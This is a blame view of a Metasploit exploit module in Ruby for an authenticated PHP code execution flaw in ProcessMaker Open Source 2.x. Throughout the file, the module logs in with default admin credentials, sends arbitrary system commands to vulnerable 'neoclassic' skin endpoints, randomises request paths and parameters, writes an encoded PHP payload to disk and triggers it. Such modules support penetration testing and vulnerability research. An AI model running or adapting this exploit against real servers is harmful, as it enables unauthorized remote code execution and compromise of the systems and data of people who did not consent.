Files
metasploit-gs/modules/exploits/multi/http/processmaker_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

199 lines
6.1 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
2025-06-20 13:20:44 +01:00
def initialize(info = {})
super(
update_info(
info,
'Name' => "ProcessMaker Open Source Authenticated PHP Code Execution",
'Description' => %q{
This module exploits a PHP code execution vulnerability in the
'neoclassic' skin for ProcessMaker Open Source which allows any
authenticated user to execute PHP code. The vulnerable skin is
installed by default in version 2.x and cannot be removed via
the web interface.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles',
'References' => [
['OSVDB', '99199'],
['BID', '63411'],
['URL', 'http://bugs.processmaker.com/view.php?id=13436']
],
2025-06-20 13:20:44 +01:00
'Payload' => {
'Space' => 8190, # HTTP POST
'DisableNops' => true,
'BadChars' => "\x00"
},
2025-06-20 13:20:44 +01:00
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
# Tested on:
# * Windows XP SP3 - ProcessMaker Open Source version 2.5.1, 2.5.0, 2.0.23
# * Debian Linux - ProcessMaker Open Source version 2.0.45
['ProcessMaker Open Source 2.x (PHP Payload)', { 'auto' => true }]
],
2025-06-20 13:20:44 +01:00
'Privileged' => false, # Privileged on Windows but not on *nix targets
'DisclosureDate' => '2013-10-24',
'DefaultTarget' => 0,
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
register_options(
[
2025-06-20 13:20:44 +01:00
OptString.new('USERNAME', [true, 'The username for ProcessMaker', 'admin']),
OptString.new('PASSWORD', [true, 'The password for ProcessMaker', 'admin']),
2017-06-13 12:46:36 +00:00
OptString.new('WORKSPACE', [true, 'The ProcessMaker workspace', 'workflow'])
2025-06-20 13:20:44 +01:00
]
)
end
#
# Send command for execution
#
2025-06-20 13:20:44 +01:00
def execute_command(cmd, opts = { :php_function => 'system' })
# random vulnerable path # confirmed in versions 2.0.23 to 2.5.1
vuln_url = [
2017-06-13 12:46:36 +00:00
"/sys#{@workspace}/en/neoclassic/appFolder/appFolderAjax.php",
"/sys#{@workspace}/en/neoclassic/cases/casesStartPage_Ajax.php",
"/sys#{@workspace}/en/neoclassic/cases/cases_SchedulerGetPlugins.php"
].sample
# shuffle POST parameters
vars_post = Hash[{
'action' => opts[:php_function],
'params' => cmd
}.to_a.shuffle]
# send payload
2016-02-01 15:12:03 -06:00
vprint_status("Attempting to execute: #{cmd}")
res = send_request_cgi({
2025-06-20 13:20:44 +01:00
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, vuln_url),
'cookie' => @cookie,
'vars_post' => vars_post
})
res
end
#
# Login
#
def login(user, pass)
# shuffle POST parameters
vars_post = Hash[{
'form[USR_USERNAME]' => Rex::Text.uri_encode(user, 'hex-normal'),
'form[USR_PASSWORD]' => Rex::Text.uri_encode(pass, 'hex-normal'),
}.to_a.shuffle]
# send login request
2016-02-01 15:12:03 -06:00
print_status("Authenticating as user '#{user}'")
begin
res = send_request_cgi({
2025-06-20 13:20:44 +01:00
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "/sys#{@workspace}/en/neoclassic/login/authentication.php"),
'cookie' => @cookie,
'vars_post' => vars_post
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
2016-02-01 15:12:03 -06:00
print_error("Connection failed")
2013-10-29 09:53:39 -05:00
return false
end
if res and res.code == 200 and res.body =~ /Loading styles and images/
2016-02-01 15:12:03 -06:00
print_good("Authenticated as user '#{user}'")
2013-10-29 09:53:39 -05:00
return true
else
2016-02-01 15:12:03 -06:00
print_error("Authenticating as user '#{user}' failed")
2013-10-29 09:53:39 -05:00
return false
end
end
#
# Check credentials are valid and confirm command execution
#
def check
2017-06-13 12:46:36 +00:00
@workspace = datastore['WORKSPACE']
# login
2025-06-20 13:20:44 +01:00
@cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10) + 10)};"
2013-10-29 09:53:39 -05:00
unless login(datastore['USERNAME'], datastore['PASSWORD'])
return Exploit::CheckCode::Unknown
end
# send check
2025-06-20 13:20:44 +01:00
fingerprint = Rex::Text.rand_text_alphanumeric(rand(10) + 10)
2016-02-01 15:12:03 -06:00
vprint_status("Sending check")
begin
res = execute_command("echo #{fingerprint}")
if res and res.body =~ /#{fingerprint}/
return Exploit::CheckCode::Vulnerable
elsif res
2013-10-29 09:53:39 -05:00
return Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
2016-02-01 15:12:03 -06:00
vprint_error("Connection failed")
2014-01-21 14:10:35 -06:00
return Exploit::CheckCode::Unknown
end
2014-01-21 14:10:35 -06:00
Exploit::CheckCode::Safe
end
#
# Write payload to filesystem
#
def upload
# Random PHP function for command execution
php_function = [
'exec',
'shell_exec',
'passthru',
'system'
].sample
# upload payload
code = "<?php #{payload.encoded} ?>"
2016-02-01 15:12:03 -06:00
print_status("Sending payload '#{@fname}' (#{code.length} bytes)")
begin
2025-06-20 13:20:44 +01:00
res = execute_command("echo \"#{code}\">#{@fname}", { :php_function => php_function })
if res and res.code == 200
2016-02-01 15:12:03 -06:00
print_good("Payload sent successfully")
register_files_for_cleanup(@fname)
else
fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
2013-10-29 09:53:39 -05:00
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
end
def exploit
2017-06-13 12:46:36 +00:00
@workspace = datastore['WORKSPACE']
# login
2025-06-20 13:20:44 +01:00
@cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10) + 10)};"
2013-10-29 09:53:39 -05:00
unless login(datastore['USERNAME'], datastore['PASSWORD'])
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
# upload payload
2025-06-20 13:20:44 +01:00
@fname = "#{rand_text_alphanumeric(rand(10) + 10)}.php"
upload
# execute payload
2016-02-01 15:12:03 -06:00
print_status("Retrieving file '#{@fname}'")
2025-06-20 13:20:44 +01:00
send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{@fname}") })
end
end